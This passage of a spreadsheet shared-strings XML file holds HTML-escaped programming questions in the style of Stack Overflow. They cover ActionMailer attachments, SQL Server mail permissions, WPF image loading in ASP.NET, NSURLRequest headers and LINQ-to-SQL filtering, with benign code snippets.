  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the correct syntax for sending an email with actionmailer that includes some PDF file attachments? I am using Gmail for SMTP, with the TLS plugin. Here is what I have so far (and have tried variations on this too):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;**lead_mailer.rb:**
  def auto_response(lead)
    recipients  lead.email
    subject     "Information"
    body        :recipient =&amp;gt; lead.first_name
    from        "me@mydomain.com"
    attachment  "application/pdf" do |a|
                a.body = File.read(RAILS_ROOT + "/public/files/Datasheet.pdf")
    end
    attachment  "application/pdf" do |a|
                a.body = File.read(RAILS_ROOT + "/public/files/OtherSheet.pdf")                
    end
  end
**lead_observer.rb:**
class LeadObserver &amp;lt; ActiveRecord::Observer
  def after_save(lead)
    mail = LeadMailer.create_auto_response(lead)
    LeadMailer.deliver(mail)
  end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that it sends the attachments, but they show up as "no name", even though upon opening them they appear correctly.  However, the body of the email does not appear at all.  I am sure I am doing something simple, wrong. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Way to Transfer Large Files in Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I often have to transfer large files &gt;50GBs sometimes &gt;100GBs between drives both internal and external during backups of our networks email servers.  What is the best method of transferring these files?  Command Line such as XCOPY?  Possibly something robust enough to continue the transfer if interrupted due to time limits or network issues.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get rid of the "default" form-element from a .aspx-page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As that web-standards geek I am, I dislike the default &lt;code&gt;&amp;lt;form runat="server"&amp;gt;&lt;/code&gt; that surrounds my entire webpages. I've seen many ASP.NET based webpages that don't have these, so it seems like it can be removed without taking away any functionality. How?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to display a message in an empty datagrid</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a datagrid which is populated with CSV data when the user drag/drops a file onto it. Is it possible to display a message in the blank grid for example "Please drag a file here" or "This grid is currently empty". The grid currently displays as a dark grey box as I wait until the file is dragged to setup the columns etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JDBC and Connection Pools in Glassfish App Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to set up a connection pool and JDBC connection on EAR deployment so I do not have to set it up on each App Server I deploy to manually.  What do I need to do?  Is there an .xml file I can put this information into?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What happened to clockless computer chips?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Several years ago, the 'next big thing' was clockless computers.  The idea behind it was that without a clock, the processors would run significantly faster.&lt;/p&gt;
&lt;p&gt;That was then, this is now and I can't find any info on how it's been coming along or if the idea was a bust...&lt;/p&gt;
&lt;p&gt;Anyone know?&lt;/p&gt;
&lt;p&gt;For reference:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www1.cs.columbia.edu/async/misc/technologyreview_oct_01_2001.html"&gt;http://www1.cs.columbia.edu/async/misc/technologyreview_oct_01_2001.html&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Way to Modify/Format Database Data in the Controller?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say that in the controller I get an array of objects from the database this way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@statuses = TwitterStatus.find(:all, :order =&amp;gt; "tweet_id DESC", :include =&amp;gt;  :twitter_user)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also I have the following loop in the view:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% unless @statuses.nil? -%&amp;gt;
&amp;lt;ol&amp;gt;
	&amp;lt;% for status in @statuses %&amp;gt;
	&amp;lt;li&amp;gt;&amp;lt;%= h(status.text -%&amp;gt;/li&amp;gt;
	&amp;lt;% end -%&amp;gt;
&amp;lt;/ol&amp;gt;
&amp;lt;% end -%&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have a lot more data in my model class (user info, status_id, etc.) that I would like to put in the view.&lt;/p&gt;
&lt;p&gt;The problem is that much of this date needs to be change.  I need to format the dates a certain way. I would like to insert 'target="_blank"' into any URLs in the "text" field.&lt;/p&gt;
&lt;p&gt;My first though would be to have something like this in the controller:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for status in @statuses
  status.date = status.date.formatDate
  status.url = status.date.insertTarget
  status.user = status.user.doUserstuff
  #Adding new attribute
  status.username = status.user.lookupUserName
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This just feels kinda lame to me.  But, I can't think of anything better.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Going from VisualStudio generated Database stuff to Programmer Generated</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to be able to better access the database so I can execute queries (primarily because I don't understand/know the API for it, but I do know SQL). I don't want to remove everything Visual Studio has done because a lot is already built upon it, but how can I get an object that I can use to execute SQL queries.&lt;/p&gt;
&lt;p&gt;This is Visual Studio 2008, C#, and MSSQL&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iPhone UIWebview -- Saving an image already downloaded</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an iPhone app with an embedded UIWebview (Safari) control.  I'd like to be able to store the images from certain webpages locally.  &lt;/p&gt;
&lt;p&gt;Can I programmatically access the path where UIWebview downloads images?  Or do I need to parse the HTML and then go find the image resource out on the net and download it again?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Taking code and design from other Websites. Ripoff or Standard?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While designing my site I am constantly faced with the issue of whether its ok to TAKE ideas and designs from other sites. In some cases there is no distinction in certain aspects. Is there anything ethically wrong with this? Is this expected in the design programming community? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to execute sp_send_dbmail while limiting permissions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to provide access to users in my database to execute  &lt;strong&gt;&lt;code&gt;msdb.dbo.sp_send_dbmail&lt;/code&gt;&lt;/strong&gt; without needing to add them to the MSDB database and the DatabaseMailUserRole?&lt;/p&gt;
&lt;p&gt;I've tried this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ALTER PROCEDURE [dbo].[_TestSendMail]
(
  @To NVARCHAR(1000),
  @Subject NVARCHAR(100),
  @Body NVARCHAR(MAX)
)
WITH EXECUTE AS OWNER
AS 
    BEGIN
        EXEC msdb.dbo.sp_send_dbmail @profile_name = N'myProfile',
            @recipients = @To, @subject = @Subject, @body = @Body
    END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I get this error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;The EXECUTE permission was denied on the object 'sp_send_dbmail', database 'msdb', schema 'dbo'.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SFTP Libraries for .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone recommend a good SFTP library to use?  Right now I'm looking at products such as SecureBlackbox, IPWorks SSH, WodSFTP, and Rebex SFTP.  However, I have never used any SFTP library before so I'm not sure what I'm looking for.&lt;/p&gt;
&lt;p&gt;If anyone has used these before, is there any reason why I should go with product "X" over "Y"?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linking to a static lib that links to a static lib</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a (managed/unmanaged C++) winforms app that links to a static library. That library links to another static library. When I do a Rebuild on the Winforms project, Visual Studio 2005 attempts to rebuild the references static library, but does not rebuild deeper than one level. This causes me to have to manually rebuild the leaf project and then rebuild up the chain to the Winforms project. Is there a way to force a deeper rebuild?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RTF editor</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a templates written in RTF(with some tags which are replaced by data from DB in app), but when I edit them in MS Word, Word put some invisible tags to the templates, which destruct my tags(I must open template in Notepad and edit code).
Do you know some editor for RTF, which strict follows RTF specification?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does a WPF BitmapImage object not download an image from a Uri Source in ASP.Net Web Forms?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to accomplish the following in ASP.Net:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create a WPF Canvas control&lt;/li&gt;
&lt;li&gt;Spin up a WPF Image control and a BitmapImage object&lt;/li&gt;
&lt;li&gt;Set the BitmapImage source to a Uri for an image&lt;/li&gt;
&lt;li&gt;Add the image to the canvas&lt;/li&gt;
&lt;li&gt;When the image is downloaded render the canvas to a new bitmap&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;My code works correctly in WPF itself, however when running in an ASP.Net page the image is not downloaded.&lt;/p&gt;
&lt;p&gt;It works totally fine for other WPF UI elements. In the case of Image, using the BitmapImage.StreamSource property to set the source works correctly. When I use the BitmapImage.UriSource property the BitmapImage.DownloadCompleted event isn't raised, which hints that the image never starts downloading in the first place.&lt;/p&gt;
&lt;p&gt;It's important to note that it works fine for most controls - ellipses, rectangles, ink presenters, and also the Image control so long as I use a stream source rather than a uri source.&lt;/p&gt;
&lt;p&gt;So, what am I missing here? Why does the BitmapImage class behave differently in a web 
application?&lt;/p&gt;
&lt;p&gt;I know I'll get asked so the purpose in doing this is that I have written a Silverlight client to create graphical content which is stored on a web server. I want the web server to render the content to bitmap files.&lt;/p&gt;
&lt;p&gt;Thanks in advance for any advice..&lt;/p&gt;
&lt;p&gt;Here's my code for the ASP.Net page:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Windows.Controls;
using System.Windows.Media.Imaging;
using System.Threading;
using System.Windows;
using System.Net;
using System.IO;
using System.Windows.Media;
public partial class _Default : System.Web.UI.Page 
{
    private static Canvas c;
    protected void Page_Load(object sender, EventArgs e)
    {
        Thread t = new Thread(new ThreadStart(
            delegate { DownloadAndSave(); }));
        t.SetApartmentState(ApartmentState.STA);
        t.Start();
        t.Join();
    }
    [STAThread]
    void DownloadAndSave()
    {
        c = new Canvas();
        BitmapImage bitmap = new BitmapImage();
        System.Windows.Controls.Image image = new System.Windows.Controls.Image();
        bitmap.DownloadCompleted += new EventHandler(bitmap_DownloadCompleted);
        bitmap.BeginInit();
        bitmap.UriSource = new Uri("http://andrew.myhre.tanash.net/customassets/andrewmyhre/image/face.jpg");
        bitmap.EndInit();
        image.Source = bitmap;
        c.Children.Add(image);
        c.UpdateLayout();
        c.Measure(new Size(400, 300));
        c.Arrange(new Rect(new Size(400, 300)));
    }
    void bitmap_DownloadCompleted(object sender, EventArgs e)
    {
        // this never fires!!
        SaveImage(c);
    }
    void SaveImage(UIElement element)
    {
        RenderTargetBitmap bmp = new RenderTargetBitmap(400, 300, 96, 96, PixelFormats.Pbgra32);
        bmp.Render(element);
        BitmapEncoder encoder = new JpegBitmapEncoder();
        encoder.Frames.Add(BitmapFrame.Create(bmp));
        using (Stream stm = File.Create(Server.MapPath("~/file.jpg")))
            encoder.Save(stm);
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Deploying bluechannel with fastcgi</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to get a basic blue-channel website running through fcgi, I have a django.fcgi file. How do I do this.
Thank you&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Webserver Location - How important is it for SEO?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am based in the UK and have two webservers, one German based (1&amp;amp;1) and the other is UK based (Easyspace).&lt;/p&gt;
&lt;p&gt;I recently signed up to the UK easyspace server because it was about the same price I paid for my 1&amp;amp;1 server but also I wanted to see if my sites hosted on a UK server gave better results in terms of UK based traffic.&lt;/p&gt;
&lt;p&gt;Its seems my traffic is roughly the same for both servers...  however 1&amp;amp;1 server performance and customer service is much better than Easyspace so I was thinking about cancelling it and getting another 1&amp;amp;1 server.&lt;/p&gt;
&lt;p&gt;I understand about latency issues where USA/Asia would be much slower for UK traffic but I am just wondering what your thoughts are traffic, SEO etc and if you think I should stick with a UK server or if it doesn't matter?  &lt;/p&gt;
&lt;p&gt;Looking forward to your replies.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python 2.x gotcha's and landmines</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The purpose of my question is to strengthen my knowledge base with Python and get a better picture of it, which includes knowing its faults and surprises.  To keep things specific, I'm only interested in the CPython interpreter.&lt;/p&gt;
&lt;p&gt;I'm looking for something similar to what learned from my &lt;a href="http://stackoverflow.com/questions/512120/php-landmines-in-general"&gt;PHP landmines&lt;/a&gt;
question where some of the answers were well known to me but a couple were borderline horrifying.&lt;/p&gt;
&lt;p&gt;Update:
   Apparently one maybe two people are upset that I asked a question that's already partially answered outside of Stack Overflow.  As some sort of compromise here's the URL
&lt;a href="http://www.ferg.org/projects/python_gotchas.html"&gt;http://www.ferg.org/projects/python_gotchas.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Note that one or two answers here already are original from what was written on the site referenced above.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dojo - XHTML validation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to make Dojo (javascript) widgets validate for XHTML?&lt;/p&gt;
&lt;p&gt;If so, how?&lt;/p&gt;
&lt;p&gt;Can it be something as simple as using CDATA?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>-[NSURLRequest sendSynchronousRequest:returningResponse:error:] getting back HTTP headers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to pull out HTTP Headers and an HTTP Response Code from a synchronous HTTP request on the iPhone. I generally don't have any issues doing this with asynchronous requests, although a bit of trouble here. The HTTP Response Headers are null and HTTP Status Code is 0. Web server is configured proper and I can retrieve the details I need in an asynchronous requests. Here's my code copied out to a command line program:&lt;/p&gt;
&lt;p&gt;Problem #1: [httpResponse allHeaderFields] returns nil.&lt;br /&gt;
Problem #2: [httpResponse statusCode] returns 0.&lt;/p&gt;
&lt;p&gt;Am I wrong in understanding that if there is an error, which I'm now seeing as: Error Domain=NSURLErrorDomain Code=-1012 UserInfo=0x14b100 "Operation could not be completed. (NSURLErrorDomain error -1012.)", that I do not get access to http response headers/status code? &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#import &amp;lt;Foundation/Foundation.h&amp;gt;
int main (int argc, char *argv[])
{    
    NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
    NSString *urlStr = @"http://tmp/myscript.php";
    NSString *postBody = @"foo=bar";   
    NSMutableURLRequest *request;
    NSData *postData = [postBody dataUsingEncoding:NSASCIIStringEncoding];
    NSError *error;
    NSURLResponse *response;
    NSHTTPURLResponse *httpResponse;
    NSData *dataReply;
    id stringReply;
    request = [NSMutableURLRequest requestWithURL: [NSURL URLWithString:urlStr]];
    [request setHTTPMethod: @"POST"];
    [request setHTTPBody:postData];
    [request setValue:@"text/xml" forHTTPHeaderField:@"Accept"];
    [request setValue:@"application/x-www-form-urlencoded" forHTTPHeaderField:@"Content-Type"];  
    dataReply = [NSURLConnection sendSynchronousRequest:request returningResponse:&amp;amp;response error:&amp;amp;error];
    stringReply = (NSString *)[[NSString alloc] initWithData:dataReply encoding:NSUTF8StringEncoding];
    // Some debug code, etc.
    NSLog(@"reply from server: %@", stringReply);
    httpResponse = (NSHTTPURLResponse *)response;
    int statusCode = [httpResponse statusCode];  
    NSLog(@"HTTP Response Headers %@", [httpResponse allHeaderFields]);	
    NSLog(@"HTTP Status code: %d", statusCode);
    // End debug.
    [[NSRunLoop currentRunLoop] run];
    [pool release];
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Best way to preserve user-generated HTML across a post request?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a site that is an interface used to create XML files that are read as input by a server side program.&lt;/p&gt;
&lt;p&gt;The website allows users to dynamically create blocks of HTML. Each block can be thought of as an object and contains several input fields. When the user submits the form, the data is turned into an XML file.  &lt;/p&gt;
&lt;p&gt;What is the best way to preserve/rebuild the user generated HTML across the post request? I am using JQuery, but not AJAX.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>A serious issue with jQuery and ActiveX security?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone not noticed that JQuery uses ActiveX controls?&lt;/p&gt;
&lt;p&gt;When a user has limited their activex security they will get script prompt popups and a yellow bar accross the top of their browser window. 
-This setting is by default on Windows Servers. 
-Internet Cafe's dont support Active X.
-Company internal workstations dont support this.&lt;/p&gt;
&lt;p&gt;Considering this I don't see how people can use JQuery in a commercial application.&lt;/p&gt;
&lt;p&gt;Do you use JQuery in a commercial application? Does this concern you? 
Do you think I should be concerned with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.NET Optimized Int32</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While reading through the 70-536 training kit, it states: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The runtime optimizes the performance
  of 32-bit integer types (Int32), so
  use those types for counters and other
  frequently accessed integral
  variables.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Does this only apply in a 32 bit environment?  Does Int64 take over in a 64 bit environment, or is Int32 still the better choice?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Seemingly random crashes with VB.NET and COM Interop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm thinking of rewriting a brand new VB.NET application in VB 6.&lt;/p&gt;
&lt;p&gt;The application runs under terminal services and makes heavy use of COM.&lt;/p&gt;
&lt;p&gt;For some reason, there is random weirdness with the application -&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Random Access Violation errors (WinDbg exception analysis points into dll's like comdlg32.dll, mscorwks)&lt;/li&gt;
&lt;li&gt;Random Buffer Overflow errors (same)&lt;/li&gt;
&lt;li&gt;Random errors in general - for example this line in Form.Load sometimes throws - Me.Icon = Resources.MyIcon&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I have followed all possible advice concerning resources, garbage collection, disposal patterns, etc... It just doesn't seem to do any good.&lt;/p&gt;
&lt;p&gt;I'm thinking there is hardware problems.  This runs on a Win2k3 virtual machine under terminal services.  The base server OS is Win2k3 with 64 GB RAM.  The server has many virtual machines each running it's own "stuff" (Exchange, etc..).&lt;/p&gt;
&lt;p&gt;Either there's hardware problems, or the .NET environment is not as easy to program against as one may think.&lt;/p&gt;
&lt;p&gt;If the hardware were somehow verified (a entirely different story) and the application continued to behave as such would it be a feasible route to take (rewrite closer to the metal)?&lt;/p&gt;
&lt;p&gt;I'm not a big fan of virtual machines and doubt their integrity.  (Especially on huge servers.)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt; - Thanks to all for the responses.  The issue turned out to be a single .NET .DLL in my application that was not being targeted to x86 code.  The COM objects are all 32 bit, the OS is 64 bit, thus my .NET application needs to be targetted to 32 bit.  (This explains why my sample VB6 apps always worked.  Not that I &lt;em&gt;really&lt;/em&gt; wanted to go that route anyway.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to match a set using Linq-2-Sql</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to figure out how to do this, and I"m stumped. I'm sure it's something simple that I'm just missing.&lt;/p&gt;
&lt;p&gt;Say I have a table that is a collection of names, and I want to check if a subset of those names exist like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var names = new List{ "John", "Steven", "Mary"};
var dbNames = from n in Db.Names
              where n.FirstName == //names ???;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there anyway to do this?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Delphi TeeChart only showing one record from dataset</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using Delphi Steema TeeChart component, if I link a BarSeries to a dataset using the user interface, it shows up fine, but if I do it using code (which I need to), it's only showing one bar, even when I have several records in the database. What am I doing wrong?&lt;/p&gt;
&lt;p&gt;Code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var
   i:Integer;
   Bar:TBarSeries;
begin
   ADataSet.Close;
   ADataSet.LoadFromDataSet(mtbl);
   ADataSet.Active := true;
   ADataSet.First;
   ASource.DataSet := ADataSet;
   Bar := TBarSeries.Create(AChart);
   Bar.Assign(Series2);
   Bar.ParentChart := AChart;
   Bar.DataSource := ASource;
   Bar.XLabelsSource := 'Date';
   Bar.YValues.ValueSource := 'Load';
   for i := 0 to AChart.SeriesCount - 1 do
   begin
      AChart.Series[i].CheckDataSource;
   end;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ADataSet is a DevExpress MemData (TdxMemData). When I run the program, the X axis is only showing one bar, the first record in the dataset, even though I have 4 records in the dataset.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Changing namespace of the WPF Project Template</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I modify the xaml's cs's I will have to go in and manually modify the corresponding *.g.cs file.  And it seems to get overwritten every time I rebuild.&lt;/p&gt;
&lt;p&gt;So my question is, what is the proper way to change the namespace on a WPF application that has been generated by the WPF project template?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Design order: Firefox, IE, or both?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When coding new javascript heavy websites, which order or web browser do you code for?&lt;/p&gt;
&lt;p&gt;I can see these possible orders, but I am not sure which I like best:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Code for one first and get it working well, then start testing with other and fix errors as I go.
&lt;ul&gt;
&lt;li&gt;This will allow for the most rapid development (with Firefox at least) but I've learned from experience that debugging IE with so much going on at once can be a pain!&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Code for both at the same time.  In other words, for each new feature, ensure it works with both browsers before moving on.
&lt;ul&gt;
&lt;li&gt;This seems like it will actually take more time, so maybe do several features in Firefox then move to IE to patch them up.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;What do you all do?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit 1:&lt;/strong&gt; To respond to a couple of answers here.:
@JQuery usage:  For some reason I was not expecting this kind of a response, however, now that this seems to be the overwhelming accepted answer, I guess I should tell everyone a few more things about the specifics of my app.  This is actually the &lt;a href="http://stackoverflow.com/questions/521723/reflective-web-application"&gt;DynWeb&lt;/a&gt; that I started another question for, and as I'm developing, a lot of the important code seems to require that I use document.whatever() instead of any JQuery or Prototype functions that I could find.  Specifically, when dynamically importing changing CSS, I have to use some similar to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var cssid = document.all ? 'rules' : 'cssRules';  //found this to take care of IE and Firefox
document.styleSheets[sheetIndex][cssid][cssRule].style[element] = value;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I expect that I will have to continue to use this kind of raw coding currently unsupported by either JQuery or Prototype in the future.  So while I would normally accept JQuery as an answer, I cannot as it is not a solution for this particular webapp.&lt;/p&gt;
&lt;p&gt;@Wedge and bigmattyh: As the webapp is supposed to build other webapps, part of the criteria is that anything it builds look and work functionally the same in whatever browsers I support (right now I'm thinking Firefox and IE7/8 atm, maybe more later on).  So as this is a more interesting (and much more complicated) problem; are there any sites, references, or insights you may have for specific trouble areas (css entities, specific javascript pitfalls and differences, etc.) and how to avoid them?  I'm almost certain that I am going to have to have some sort of &lt;code&gt;isIE&lt;/code&gt; variable and simply perform different actions based on that, but I would like to avoid it as much as possible.&lt;/p&gt;
&lt;p&gt;Thanks for your input so far!  I will keep this open for the rest of the day to see what others may have to say, and will accept an answer sometime tonight.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unregistering RemotingConfiguration unregister well known type</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to Unregister RemotingConfiguration unregister well known type&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is the SMPP (binary SMS) protocol dead?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone dealt with the SMPP binary SMS protocol?  I know this technology is still fairly widely used by the messaging aggregators and carriers, but it seems like the SMPP spec is not being updated, and support for SMPP libraries is slowly fading away.  The "SMS Forum" (&lt;a href="http://www.smsforum.net/"&gt;http://www.smsforum.net&lt;/a&gt;) was shut down in 2007.&lt;/p&gt;
&lt;p&gt;To me, it feels like the protocol is dying in favor of web-service interfaces, but I was curious what other people think.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Initialising an instance variable with a method from the class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can I initialize an instance variable in Java, when I initialise it when I declare it, and initialise it with the return value of a method, which I define later in the class. &lt;/p&gt;
&lt;p&gt;Something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyClass {
     integers[] myArray = new integers[length()];
     int length() {
     ....
     }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;length()&lt;/code&gt; gives me some number, and I want this number to determine the number of elements in the array. It seems plausible to me, but I get &lt;code&gt;NullPointerException&lt;/code&gt; (I don't know whether this mistake initialization is causing the exception, but I don't know what exactly, and because I have never done this initialization before, I am not sure it is correct).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any Static Code Analysis Tools for Stored Procedures?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any &lt;a href="http://en.wikipedia.org/wiki/Static_code_analysis"&gt;static code analysis&lt;/a&gt; tools for &lt;a href="http://en.wikipedia.org/wiki/Stored_procedure"&gt;stored procedures&lt;/a&gt; written particularly in &lt;a href="http://en.wikipedia.org/wiki/PL_SQL"&gt;PL/SQL&lt;/a&gt; and &lt;a href="http://en.wikipedia.org/wiki/Transact-SQL"&gt;T-SQL&lt;/a&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When do structs not live on the stack?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm reading through Jon Skeet's book reviews and he is going over the &lt;a href="http://msmvps.com/blogs/jon_skeet/archive/2008/03/21/book-review-head-first-c.aspx" rel="nofollow"&gt;numerous inaccuracies&lt;/a&gt; of &lt;a href="http://rads.stackoverflow.com/amzn/click/0596514824" rel="nofollow"&gt;Head First C#&lt;/a&gt;. &lt;/p&gt;
&lt;p&gt;One of them caught my eye:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;[Under Errors Section] Claiming that structs always live on the stack. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In what situations would structs &lt;em&gt;not&lt;/em&gt; live on the stack?  This goes contrary to what I thought I knew about structs.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ-to-SQL select filter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to ensure a particular conditional clause is added to the expression tree on each select from a particular table? &lt;/p&gt;
&lt;p&gt;For example, a table with a field with the date a record was deleted should never come back or be included in any kind of statement. &lt;/p&gt;
&lt;p&gt;Rather than include a where clause each time, is there a way, without creating a view, to add a conditional to each select?&lt;/p&gt;
&lt;p&gt;--- Edit for clarity below ---&lt;/p&gt;
&lt;p&gt;I'm looking for a function I can partial, much like the Insert/Update/Delete functions, but for Selecting. I want to apply a blanket filter to all queries against a table. &lt;/p&gt;
&lt;p&gt;Furthermore, if I get a collection of items from a parent, I want that set to be filtered as well. &lt;/p&gt;
&lt;p&gt;Something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Function BaseItems() As IQueryable(Of Item)
    Return (From mi In dataContext.Items Where mi.DeletedAt Is Nothing Select mi)
End Function
Public Function GetItems() as list(of Item)
    Return (From mi in BaseItems() select mi).ToList()
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;works for functions I write and call. ITEMS, can be a child of MASTER, for example. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;'assume TheMaster is a LinqToSQL data class which has a one to many child of Items
TheMaster.Items.Count '&amp;lt;-- will bring back all Items.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I always filter what populates by data classes?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>String manipulation without memory leaks?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to do a series of string substitutions to removed xml-escaped chars such as &lt;code&gt;'&amp;amp;amp;'&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;1) Is there an existing UIKit function that can do this?&lt;/p&gt;
&lt;p&gt;2) If not, what's the best way to do it without leaking memory? Here's the idea:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-(NSString*) unescape:(NSString*)string
{
    string = [string stringByReplacingOccurrencesOfString:@"&amp;amp;apos;" withString:@"'"];
    string = [string stringByReplacingOccurrencesOfString:@"&amp;amp;amp;" withString:@"&amp;amp;"];
    string = [string stringByReplacingOccurrencesOfString:@"&amp;amp;quot;" withString:@"\""];
    string = [string stringByReplacingOccurrencesOfString:@"&amp;amp;gt;" withString:@"&amp;gt;"];
    string = [string stringByReplacingOccurrencesOfString:@"&amp;amp;lt;" withString:@"&amp;lt;"];
    return string;
}
&lt;/code&gt;&lt;/pre&gt;
